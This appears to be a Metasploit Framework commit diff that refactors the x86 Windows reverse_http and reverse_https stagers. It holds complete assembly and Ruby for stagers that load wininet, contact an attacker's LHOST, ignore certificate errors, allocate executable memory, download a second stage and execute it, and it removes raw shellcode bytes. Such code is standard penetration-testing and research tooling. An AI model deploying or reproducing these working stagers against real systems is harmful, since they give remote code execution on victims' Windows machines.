mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-29 18:07:27 +01:00
Refactor x86 Windows reverse_http and reverse_https stagers
This commit is contained in:
parent
cd992d5ea6
commit
966848127a
@ -76,8 +76,11 @@ module Msf
|
||||
# Create a URI that matches a given checksum
|
||||
#
|
||||
# @param sum [Fixnum] The checksum value you are trying to create a URI for
|
||||
# @param len [Fixnum] An optional length value for the created URI
|
||||
# @return [String] The URI string that checksums to the given value
|
||||
def generate_uri_checksum(sum)
|
||||
def generate_uri_checksum(sum,len=nil)
|
||||
return generate_uri_checksum_with_length(sum, len) if len
|
||||
|
||||
chk = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
|
||||
32.times do
|
||||
uri = Rex::Text.rand_text_alphanumeric(3)
|
||||
@ -90,6 +93,35 @@ module Msf
|
||||
return URI_CHECKSUM_PRECALC[sum]
|
||||
end
|
||||
|
||||
# Create an arbitrary length URI that matches a given checksum
|
||||
#
|
||||
# @param sum [Fixnum] The checksum value you are trying to create a URI for
|
||||
# @param len [Fixnum] The length of the created URI
|
||||
# @return [String] The URI string that checksums to the given value
|
||||
def generate_uri_checksum_with_length(sum, len)
|
||||
# Lengths shorter than 4 bytes are unable to match all possible checksums
|
||||
# Lengths of exactly 4 are relatively slow to find for high checksum values
|
||||
# Lengths of 5 or more bytes find a matching checksum fairly quickly (~80ms)
|
||||
raise ArgumentError, "Length must be 5 bytes or greater" if len < 5
|
||||
|
||||
# Funny enough, this was more efficient than calculating checksum offsets
|
||||
if len < 40
|
||||
loop do
|
||||
uri = Rex::Text.rand_text_alphanumeric(len)
|
||||
return uri if Rex::Text.checksum8(uri) == sum
|
||||
end
|
||||
end
|
||||
|
||||
# The rand_text_alphanumeric() method becomes a bottleneck at around 40 bytes
|
||||
# Calculating a static prefix flattens out the average runtime for longer URIs
|
||||
prefix = Rex::Text.rand_text_alphanumeric(len-20)
|
||||
|
||||
loop do
|
||||
uri = prefix + Rex::Text.rand_text_alphanumeric(20)
|
||||
return uri if Rex::Text.checksum8(uri) == sum
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -150,5 +150,12 @@ module Msf::Payload::Windows
|
||||
return true
|
||||
end
|
||||
|
||||
#
|
||||
# Share the EXITFUNC mappings with other classes
|
||||
#
|
||||
def self.exit_types
|
||||
@@exit_types.dup
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
112
lib/msf/core/payload/windows/block_api.rb
Normal file
112
lib/msf/core/payload/windows/block_api.rb
Normal file
@ -0,0 +1,112 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
|
||||
###
|
||||
#
|
||||
# Basic block_api stubs for Windows ARCH_X86 payloads
|
||||
#
|
||||
###
|
||||
|
||||
|
||||
module Payload::Windows::BlockApi
|
||||
|
||||
def asm_block_api(opts={})
|
||||
|
||||
raw = %q^
|
||||
|
||||
api_call:
|
||||
pushad ; We preserve all the registers for the caller, bar EAX and ECX.
|
||||
mov ebp, esp ; Create a new stack frame
|
||||
xor eax, eax ; Zero EAX (upper 3 bytes will remain zero until function is found)
|
||||
mov edx, [fs:eax+48] ; Get a pointer to the PEB
|
||||
mov edx, [edx+12] ; Get PEB->Ldr
|
||||
mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list
|
||||
next_mod: ;
|
||||
mov esi, [edx+40] ; Get pointer to modules name (unicode string)
|
||||
movzx ecx, word [edx+38] ; Set ECX to the length we want to check
|
||||
xor edi, edi ; Clear EDI which will store the hash of the module name
|
||||
loop_modname: ;
|
||||
lodsb ; Read in the next byte of the name
|
||||
cmp al, 'a' ; Some versions of Windows use lower case module names
|
||||
jl not_lowercase ;
|
||||
sub al, 0x20 ; If so normalise to uppercase
|
||||
not_lowercase: ;
|
||||
ror edi, 13 ; Rotate right our hash value
|
||||
add edi, eax ; Add the next byte of the name
|
||||
loop loop_modname ; Loop untill we have read enough
|
||||
|
||||
; We now have the module hash computed
|
||||
push edx ; Save the current position in the module list for later
|
||||
push edi ; Save the current module hash for later
|
||||
; Proceed to iterate the export address table
|
||||
mov edx, [edx+16] ; Get this modules base address
|
||||
mov ecx, [edx+60] ; Get PE header
|
||||
|
||||
; use ecx as our EAT pointer here so we can take advantage of jecxz.
|
||||
mov ecx, [ecx+edx+120] ; Get the EAT from the PE header
|
||||
jecxz get_next_mod1 ; If no EAT present, process the next module
|
||||
add ecx, edx ; Add the modules base address
|
||||
push ecx ; Save the current modules EAT
|
||||
mov ebx, [ecx+32] ; Get the rva of the function names
|
||||
add ebx, edx ; Add the modules base address
|
||||
mov ecx, [ecx+24] ; Get the number of function names
|
||||
; now ecx returns to its regularly scheduled counter duties
|
||||
|
||||
; Computing the module hash + function hash
|
||||
get_next_func: ;
|
||||
jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
|
||||
dec ecx ; Decrement the function name counter
|
||||
mov esi, [ebx+ecx*4] ; Get rva of next module name
|
||||
add esi, edx ; Add the modules base address
|
||||
xor edi, edi ; Clear EDI which will store the hash of the function name
|
||||
; And compare it to the one we want
|
||||
loop_funcname: ;
|
||||
lodsb ; Read in the next byte of the ASCII function name
|
||||
ror edi, 13 ; Rotate right our hash value
|
||||
add edi, eax ; Add the next byte of the name
|
||||
cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
|
||||
jne loop_funcname ; If we have not reached the null terminator, continue
|
||||
add edi, [ebp-8] ; Add the current module hash to the function hash
|
||||
cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for
|
||||
jnz get_next_func ; Go compute the next function hash if we have not found it
|
||||
|
||||
; If found, fix up stack, call the function and then value else compute the next one...
|
||||
pop eax ; Restore the current modules EAT
|
||||
mov ebx, [eax+36] ; Get the ordinal table rva
|
||||
add ebx, edx ; Add the modules base address
|
||||
mov cx, [ebx+2*ecx] ; Get the desired functions ordinal
|
||||
mov ebx, [eax+28] ; Get the function addresses table rva
|
||||
add ebx, edx ; Add the modules base address
|
||||
mov eax, [ebx+4*ecx] ; Get the desired functions RVA
|
||||
add eax, edx ; Add the modules base address to get the functions actual VA
|
||||
; We now fix up the stack and perform the call to the desired function...
|
||||
finish:
|
||||
mov [esp+36], eax ; Overwrite the old EAX value with the desired api address for the upcoming popad
|
||||
pop ebx ; Clear off the current modules hash
|
||||
pop ebx ; Clear off the current position in the module list
|
||||
popad ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
|
||||
pop ecx ; Pop off the origional return address our caller will have pushed
|
||||
pop edx ; Pop off the hash value our caller will have pushed
|
||||
push ecx ; Push back the correct return value
|
||||
jmp eax ; Jump into the required function
|
||||
; We now automagically return to the correct caller...
|
||||
|
||||
get_next_mod: ;
|
||||
pop edi ; Pop off the current (now the previous) modules EAT
|
||||
get_next_mod1: ;
|
||||
pop edi ; Pop off the current (now the previous) modules hash
|
||||
pop edx ; Restore our position in the module list
|
||||
mov edx, [edx] ; Get the next module
|
||||
jmp.i8 next_mod ; Process this module
|
||||
^
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
79
lib/msf/core/payload/windows/exitfunk.rb
Normal file
79
lib/msf/core/payload/windows/exitfunk.rb
Normal file
@ -0,0 +1,79 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/payload/windows'
|
||||
module Msf
|
||||
|
||||
|
||||
###
|
||||
#
|
||||
# Implements arbitrary exit routines for Windows ARCH_X86 payloads
|
||||
#
|
||||
###
|
||||
|
||||
module Payload::Windows::Exitfunk
|
||||
|
||||
def asm_exitfunk(opts={})
|
||||
|
||||
asm = "exitfunk:\n"
|
||||
|
||||
case opts[:exitfunk]
|
||||
|
||||
when 'seh'
|
||||
asm << %Q^
|
||||
mov ebx, #{"0x%.8x" % Msf::Payload::Windows.exit_types['seh']}
|
||||
push.i8 0 ; push the exit function parameter
|
||||
push ebx ; push the hash of the exit function
|
||||
call ebp ; SetUnhandledExceptionFilter(0)
|
||||
push.i8 0
|
||||
ret ; Return to NULL (crash)
|
||||
^
|
||||
|
||||
# On Windows Vista, Server 2008, and newer, it is not possible to call ExitThread
|
||||
# on WoW64 processes, instead we need to call RtlExitUserThread. This stub will
|
||||
# automatically generate the right code depending on the selected exit method.
|
||||
|
||||
when 'thread'
|
||||
asm << %Q^
|
||||
mov ebx, #{"0x%.8x" % Msf::Payload::Windows.exit_types['thread']}
|
||||
push 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" )
|
||||
call ebp ; GetVersion(); (AL will = major version and AH will = minor version)
|
||||
cmp al, 6 ; If we are not running on Windows Vista, 2008 or 7
|
||||
jl exitfunk_goodbye ; Then just call the exit function...
|
||||
cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
|
||||
jne exitfunk_goodbye ;
|
||||
mov ebx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
|
||||
exitfunk_goodbye: ; We now perform the actual call to the exit function
|
||||
push.i8 0 ; push the exit function parameter
|
||||
push ebx ; push the hash of the exit function
|
||||
call ebp ; call ExitThread(0) || RtlExitUserThread(0)
|
||||
^
|
||||
|
||||
when 'process', nil
|
||||
asm << %Q^
|
||||
mov ebx, #{"0x%.8x" % Msf::Payload::Windows.exit_types['process']}
|
||||
push.i8 0 ; push the exit function parameter
|
||||
push ebx ; push the hash of the exit function
|
||||
call ebp ; ExitProcess(0)
|
||||
^
|
||||
|
||||
when 'sleep'
|
||||
asm << %Q^
|
||||
mov ebx, #{"0x%.8x" % Rex::Text.ror13_hash('Sleep')}
|
||||
push 300000 ; 300 seconds
|
||||
push ebx ; push the hash of the function
|
||||
call ebp ; Sleep(300000)
|
||||
jmp exitfunk ; repeat
|
||||
^
|
||||
else
|
||||
# Do nothing and continue after the end of the shellcode
|
||||
end
|
||||
|
||||
asm
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
339
lib/msf/core/payload/windows/reverse_http.rb
Normal file
339
lib/msf/core/payload/windows/reverse_http.rb
Normal file
@ -0,0 +1,339 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/payload/windows/block_api'
|
||||
require 'msf/core/payload/windows/exitfunk'
|
||||
|
||||
module Msf
|
||||
|
||||
|
||||
###
|
||||
#
|
||||
# Complex payload generation for Windows ARCH_X86 that speak HTTP(S)
|
||||
#
|
||||
###
|
||||
|
||||
|
||||
module Payload::Windows::ReverseHttp
|
||||
|
||||
include Msf::Payload::Windows::BlockApi
|
||||
include Msf::Payload::Windows::Exitfunk
|
||||
|
||||
#
|
||||
# Register reverse_http specific options
|
||||
#
|
||||
def initialize(*args)
|
||||
super
|
||||
register_advanced_options(
|
||||
[
|
||||
OptInt.new('HTTPStagerURILength', [false, 'The URI length for the stager (5 to 240ish bytes)'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
# Generate the simple version of this stager if we don't have enough space
|
||||
if self.available_space.nil? || required_space > self.available_space
|
||||
return generate_reverse_http(
|
||||
ssl: false,
|
||||
host: datastore['LHOST'],
|
||||
port: datastore['LPORT'],
|
||||
url: "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW))
|
||||
end
|
||||
|
||||
conf = {
|
||||
ssl: false,
|
||||
host: datastore['LHOST'],
|
||||
port: datastore['LPORT'],
|
||||
url: generate_uri,
|
||||
exitfunk: datastore['EXITFUNC']
|
||||
}
|
||||
|
||||
generate_reverse_http(conf)
|
||||
end
|
||||
|
||||
#
|
||||
# Generate and compile the stager
|
||||
#
|
||||
def generate_reverse_http(opts={})
|
||||
combined_asm = %Q^
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
#{asm_block_api}
|
||||
start:
|
||||
pop ebp
|
||||
#{asm_reverse_http(opts)}
|
||||
^
|
||||
Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
|
||||
end
|
||||
|
||||
#
|
||||
# Generate the URI for the initial stager
|
||||
#
|
||||
def generate_uri
|
||||
# Maximum URL is limited to https:// plus 256 bytes, figure out our maximum URI
|
||||
uri_max_len = 256 - "#{datastore['LHOST']}:#{datastore['LPORT']}/".length
|
||||
uri_req_len = datastore['HTTPStagerURILength'].to_i
|
||||
|
||||
if uri_req_len > 0
|
||||
|
||||
if uri_req_len > uri_max_len
|
||||
raise ArgumentError, "Maximum HTTPStagerURILength is #{uri_max_len}"
|
||||
end
|
||||
|
||||
if uri_req_len < 5
|
||||
raise ArgumentError, "Minimum HTTPStagerURILength is 5"
|
||||
end
|
||||
|
||||
return "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW, uri_req_len)
|
||||
end
|
||||
|
||||
# Generate a random 30+ byte URI
|
||||
"/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW, 30 + rand(uri_max_len-30))
|
||||
end
|
||||
|
||||
#
|
||||
# Determine the maximum amount of space required for the features requested
|
||||
#
|
||||
def required_space
|
||||
# Start with our cached default generated size
|
||||
space = cached_size
|
||||
|
||||
# Add 100 bytes for the encoder to have some room
|
||||
space += 100
|
||||
|
||||
# Add 251 bytes for large URI support (technically a little less, but lets go with it)
|
||||
space += 251
|
||||
|
||||
# EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others)
|
||||
space += 31
|
||||
|
||||
# The final estimated size
|
||||
space
|
||||
end
|
||||
|
||||
#
|
||||
# Dynamic payload generation
|
||||
#
|
||||
def asm_reverse_http(opts={})
|
||||
|
||||
#
|
||||
# options should contain:
|
||||
# ssl: (true|false)
|
||||
# url: "/url_to_request"
|
||||
# host: [hostname]
|
||||
# port: [port]
|
||||
# exitfunk: [process|thread|seh|sleep]
|
||||
#
|
||||
|
||||
http_open_flags = 0
|
||||
|
||||
if opts[:ssl]
|
||||
#;0x80000000 | ; INTERNET_FLAG_RELOAD
|
||||
#;0x04000000 | ; INTERNET_NO_CACHE_WRITE
|
||||
#;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION
|
||||
#;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
|
||||
#;0x00000200 | ; INTERNET_FLAG_NO_UI
|
||||
#;0x00800000 | ; INTERNET_FLAG_SECURE
|
||||
#;0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
|
||||
#;0x00001000 ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
|
||||
http_open_flags = ( 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 | 0x00800000 | 0x00002000 | 0x00001000 )
|
||||
else
|
||||
#;0x80000000 | ; INTERNET_FLAG_RELOAD
|
||||
#;0x04000000 | ; INTERNET_NO_CACHE_WRITE
|
||||
#;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION
|
||||
#;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
|
||||
#;0x00000200 ; INTERNET_FLAG_NO_UI
|
||||
http_open_flags = ( 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 )
|
||||
end
|
||||
|
||||
asm = %Q^
|
||||
;-----------------------------------------------------------------------------;
|
||||
; Author: HD Moore
|
||||
; Compatible: Confirmed Windows 7, Windows 2008 Server, Windows XP SP1, Windows SP3, Windows 2000
|
||||
; Known Bugs: Incompatible with Windows NT 4.0, buggy on Windows XP Embedded (SP1)
|
||||
; Version: 1.0
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
; Input: EBP must be the address of 'api_call'.
|
||||
; Output: EDI will be the socket for the connection to the server
|
||||
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
|
||||
load_wininet:
|
||||
push 0x0074656e ; Push the bytes 'wininet',0 onto the stack.
|
||||
push 0x696e6977 ; ...
|
||||
push esp ; Push a pointer to the "wininet" string on the stack.
|
||||
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
|
||||
call ebp ; LoadLibraryA( "wininet" )
|
||||
|
||||
set_retry:
|
||||
push.i8 8 ; retry 8 times should be enough
|
||||
pop edi
|
||||
xor ebx, ebx ; push 8 zeros ([1]-[8])
|
||||
mov ecx, edi
|
||||
push_zeros:
|
||||
push ebx
|
||||
loop push_zeros
|
||||
|
||||
internetopen:
|
||||
; DWORD dwFlags [1]
|
||||
; LPCTSTR lpszProxyBypass (NULL) [2]
|
||||
; LPCTSTR lpszProxyName (NULL) [3]
|
||||
; DWORD dwAccessType (PRECONFIG = 0) [4]
|
||||
; LPCTSTR lpszAgent (NULL) [5]
|
||||
push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" )
|
||||
call ebp
|
||||
|
||||
internetconnect:
|
||||
; DWORD_PTR dwContext (NULL) [6]
|
||||
; dwFlags [7]
|
||||
push.i8 3 ; DWORD dwService (INTERNET_SERVICE_HTTP)
|
||||
push ebx ; password (NULL)
|
||||
push ebx ; username (NULL)
|
||||
push #{opts[:port]} ; PORT
|
||||
call got_server_uri ; double call to get pointer for both server_uri and
|
||||
server_uri: ; server_host; server_uri is saved in EDI for later
|
||||
db "#{opts[:url]}", 0x00
|
||||
got_server_host:
|
||||
push eax ; HINTERNET hInternet
|
||||
push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" )
|
||||
call ebp
|
||||
|
||||
httpopenrequest:
|
||||
; dwContext (NULL) [8]
|
||||
push #{"0x%.8x" % http_open_flags} ; dwFlags
|
||||
push ebx ; accept types
|
||||
push ebx ; referrer
|
||||
push ebx ; version
|
||||
push edi ; server URI
|
||||
push ebx ; method
|
||||
push eax ; hConnection
|
||||
push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" )
|
||||
call ebp
|
||||
xchg esi, eax ; save hHttpRequest in esi
|
||||
|
||||
send_request:
|
||||
^
|
||||
|
||||
if opts[:ssl]
|
||||
asm << %Q^
|
||||
; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
|
||||
set_security_options:
|
||||
push 0x00003380
|
||||
;0x00002000 | ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
|
||||
;0x00001000 | ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
|
||||
;0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE
|
||||
;0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
|
||||
;0x00000080 ; SECURITY_FLAG_IGNORE_REVOCATION
|
||||
mov eax, esp
|
||||
push.i8 4 ; sizeof(dwFlags)
|
||||
push eax ; &dwFlags
|
||||
push.i8 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
|
||||
push esi ; hHttpRequest
|
||||
push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
|
||||
call ebp
|
||||
^
|
||||
end
|
||||
|
||||
asm << %Q^
|
||||
httpsendrequest:
|
||||
push ebx ; lpOptional length (0)
|
||||
push ebx ; lpOptional (NULL)
|
||||
push ebx ; dwHeadersLength (0)
|
||||
push ebx ; lpszHeaders (NULL)
|
||||
push esi ; hHttpRequest
|
||||
push 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" )
|
||||
call ebp
|
||||
test eax,eax
|
||||
jnz allocate_memory
|
||||
|
||||
try_it_again:
|
||||
dec edi
|
||||
jnz send_request
|
||||
|
||||
; if we didn't allocate before running out of retries, bail out
|
||||
^
|
||||
|
||||
if opts[:exitfunk]
|
||||
asm << %Q^
|
||||
failure:
|
||||
call exitfunk
|
||||
^
|
||||
else
|
||||
asm << %Q^
|
||||
failure:
|
||||
push 0x56A2B5F0 ; hardcoded to exitprocess for size
|
||||
call ebp
|
||||
^
|
||||
end
|
||||
|
||||
asm << %Q^
|
||||
allocate_memory:
|
||||
push.i8 0x40 ; PAGE_EXECUTE_READWRITE
|
||||
push 0x1000 ; MEM_COMMIT
|
||||
push 0x00400000 ; Stage allocation (4Mb ought to do us)
|
||||
push ebx ; NULL as we dont care where the allocation is
|
||||
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
|
||||
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
|
||||
|
||||
download_prep:
|
||||
xchg eax, ebx ; place the allocated base address in ebx
|
||||
push ebx ; store a copy of the stage base address on the stack
|
||||
push ebx ; temporary storage for bytes read count
|
||||
mov edi, esp ; &bytesRead
|
||||
|
||||
download_more:
|
||||
push edi ; &bytesRead
|
||||
push 8192 ; read length
|
||||
push ebx ; buffer
|
||||
push esi ; hRequest
|
||||
push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" )
|
||||
call ebp
|
||||
|
||||
test eax,eax ; download failed? (optional?)
|
||||
jz failure
|
||||
|
||||
mov eax, [edi]
|
||||
add ebx, eax ; buffer += bytes_received
|
||||
|
||||
test eax,eax ; optional?
|
||||
jnz download_more ; continue until it returns 0
|
||||
pop eax ; clear the temporary storage
|
||||
|
||||
execute_stage:
|
||||
ret ; dive into the stored stage address
|
||||
|
||||
got_server_uri:
|
||||
pop edi
|
||||
call got_server_host
|
||||
|
||||
server_host:
|
||||
db "#{opts[:host]}", 0x00
|
||||
^
|
||||
|
||||
if opts[:exitfunk]
|
||||
asm << asm_exitfunk(opts)
|
||||
end
|
||||
asm
|
||||
end
|
||||
|
||||
#
|
||||
# Do not transmit the stage over the connection. We handle this via HTTPS
|
||||
#
|
||||
def stage_over_connection?
|
||||
false
|
||||
end
|
||||
|
||||
#
|
||||
# Always wait at least 20 seconds for this payload (due to staging delays)
|
||||
#
|
||||
def wfs_delay
|
||||
20
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
63
lib/msf/core/payload/windows/reverse_https.rb
Normal file
63
lib/msf/core/payload/windows/reverse_https.rb
Normal file
@ -0,0 +1,63 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/payload/windows/reverse_http'
|
||||
|
||||
module Msf
|
||||
|
||||
|
||||
###
|
||||
#
|
||||
# Complex payload generation for Windows ARCH_X86 that speak HTTPS
|
||||
#
|
||||
###
|
||||
|
||||
|
||||
module Payload::Windows::ReverseHttps
|
||||
|
||||
include Msf::Payload::Windows::ReverseHttp
|
||||
|
||||
#
|
||||
# Generate and compile the stager
|
||||
#
|
||||
def generate_reverse_https(opts={})
|
||||
combined_asm = %Q^
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
#{asm_block_api}
|
||||
start:
|
||||
pop ebp
|
||||
#{asm_reverse_http(opts)}
|
||||
^
|
||||
Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
|
||||
end
|
||||
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
|
||||
# Generate the simple version of this stager if we don't have enough space
|
||||
if self.available_space.nil? || required_space > self.available_space
|
||||
return generate_reverse_https(
|
||||
host: datastore['LHOST'],
|
||||
port: datastore['LPORT'],
|
||||
url: "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW),
|
||||
ssl: true)
|
||||
end
|
||||
|
||||
conf = {
|
||||
ssl: true,
|
||||
host: datastore['LHOST'],
|
||||
port: datastore['LPORT'],
|
||||
url: generate_uri,
|
||||
exitfunk: datastore['EXITFUNC']
|
||||
}
|
||||
|
||||
generate_reverse_https(conf)
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
@ -6,14 +6,15 @@
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/reverse_http'
|
||||
|
||||
require 'msf/core/payload/windows/reverse_http'
|
||||
|
||||
module Metasploit3
|
||||
|
||||
CachedSize = 322
|
||||
CachedSize = 306
|
||||
|
||||
include Msf::Payload::Stager
|
||||
include Msf::Payload::Windows
|
||||
include Msf::Payload::Windows::ReverseHttp
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
@ -24,68 +25,6 @@ module Metasploit3
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
'Handler' => Msf::Handler::ReverseHttp,
|
||||
'Convention' => 'sockedi http',
|
||||
'Stager' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
# Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now)
|
||||
# 'EXITFUNC' => [ 240, 'V' ],
|
||||
'LPORT' => [ 177, 'v' ], # Not a typo, really little endian
|
||||
},
|
||||
'Payload' =>
|
||||
"\xFC\xE8\x82\x00\x00\x00\x60\x89\xE5\x31\xC0\x64\x8B\x50\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\xAC\x3C" +
|
||||
"\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF2\x52\x57\x8B\x52" +
|
||||
"\x10\x8B\x4A\x3C\x8B\x4C\x11\x78\xE3\x48\x01\xD1\x51\x8B\x59\x20" +
|
||||
"\x01\xD3\x8B\x49\x18\xE3\x3A\x49\x8B\x34\x8B\x01\xD6\x31\xFF\xAC" +
|
||||
"\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF6\x03\x7D\xF8\x3B\x7D\x24\x75" +
|
||||
"\xE4\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3" +
|
||||
"\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF" +
|
||||
"\xE0\x5F\x5F\x5A\x8B\x12\xEB\x8D\x5D\x68\x6E\x65\x74\x00\x68\x77" +
|
||||
"\x69\x6E\x69\x54\x68\x4C\x77\x26\x07\xFF\xD5\x6A\x08\x5F\x31\xDB" +
|
||||
"\x89\xF9\x53\xE2\xFD\x68\x3A\x56\x79\xA7\xFF\xD5\x6A\x03\x53\x53" +
|
||||
"\x68\x5C\x11\x00\x00\xE8\x72\x00\x00\x00\x2F\x31\x32\x33\x34\x35" +
|
||||
"\x00\x50\x68\x57\x89\x9F\xC6\xFF\xD5\x68\x00\x02\x60\x84\x53\x53" +
|
||||
"\x53\x57\x53\x50\x68\xEB\x55\x2E\x3B\xFF\xD5\x96\x53\x53\x53\x53" +
|
||||
"\x56\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x0A\x4F\x75\xED\x68" +
|
||||
"\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00" +
|
||||
"\x40\x00\x53\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57" +
|
||||
"\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0" +
|
||||
"\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\x5F\xE8\x8F\xFF" +
|
||||
"\xFF\xFF"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
#
|
||||
# Do not transmit the stage over the connection. We handle this via HTTPS
|
||||
#
|
||||
def stage_over_connection?
|
||||
false
|
||||
end
|
||||
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
p = super
|
||||
i = p.index("/12345\x00")
|
||||
u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW) + "\x00"
|
||||
p[i, u.length] = u
|
||||
|
||||
lhost = datastore['LHOST'] || '127.127.127.127'
|
||||
if Rex::Socket.is_ipv6?(lhost)
|
||||
lhost = "[#{lhost}]"
|
||||
end
|
||||
|
||||
p + lhost + "\x00"
|
||||
end
|
||||
|
||||
#
|
||||
# Always wait at least 20 seconds for this payload (due to staging delays)
|
||||
#
|
||||
def wfs_delay
|
||||
20
|
||||
'Convention' => 'sockedi http'))
|
||||
end
|
||||
end
|
||||
|
@ -6,14 +6,16 @@
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/reverse_https'
|
||||
require 'msf/core/payload/windows/reverse_https'
|
||||
|
||||
|
||||
module Metasploit3
|
||||
|
||||
CachedSize = 327
|
||||
CachedSize = 326
|
||||
|
||||
include Msf::Payload::Stager
|
||||
include Msf::Payload::Windows
|
||||
include Msf::Payload::Windows::ReverseHttps
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
@ -24,64 +26,7 @@ module Metasploit3
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
'Handler' => Msf::Handler::ReverseHttps,
|
||||
'Convention' => 'sockedi https',
|
||||
'Stager' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
# Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now)
|
||||
# 'EXITFUNC' => [ 260, 'V' ],
|
||||
'LPORT' => [ 177, 'v' ], # Not a typo, really little endian
|
||||
},
|
||||
'Payload' =>
|
||||
"\xFC\xE8\x82\x00\x00\x00\x60\x89\xE5\x31\xC0\x64\x8B\x50\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\xAC\x3C" +
|
||||
"\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF2\x52\x57\x8B\x52" +
|
||||
